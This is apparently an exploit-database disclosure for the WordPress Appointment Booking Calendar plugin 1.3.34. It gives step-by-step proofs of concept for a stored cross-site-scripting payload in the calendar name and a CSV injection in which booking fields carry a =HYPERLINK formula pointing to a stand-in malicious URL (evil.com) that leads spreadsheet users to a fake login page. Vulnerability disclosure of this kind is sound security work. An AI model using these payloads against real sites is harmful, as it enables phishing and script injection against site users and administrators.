38 lines
No EOL
1.5 KiB
Text
38 lines
No EOL
1.5 KiB
Text
# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
|
|
# Google Dork: N/A
|
|
# Date: 2020-03-05
|
|
# Exploit Author: Daniel Monzón (stark0de)
|
|
# Vendor Homepage: https://www.codepeople.net/
|
|
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
|
|
# Version: 1.3.34
|
|
# Tested on: Windows 7 x86 SP1
|
|
# CVE : CVE-2020-9371, CVE-2020-9372
|
|
|
|
----Stored Cross-Site-Scripting-------------------
|
|
|
|
1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
|
|
2) Calendar Name=<script>alert(0)</script> and Update
|
|
3) Click in any of the other tabs
|
|
|
|
----CSV injection---------------------------------
|
|
|
|
1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out)
|
|
2) Then we go to the page and introduce data, and the payload:
|
|
|
|
New booking:
|
|
|
|
Name: IMPORTANT DATA
|
|
Description: http://evil.com/evil.php
|
|
|
|
New booking:
|
|
|
|
Name: test
|
|
Description: =HYPERLINK(K2;H2)
|
|
|
|
This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel
|
|
|
|
3) Then we go to Bookings List and export the CSV file
|
|
4) After that we open the file, and import data from an external file, using comma as separator
|
|
5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)
|
|
|
|
Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016 |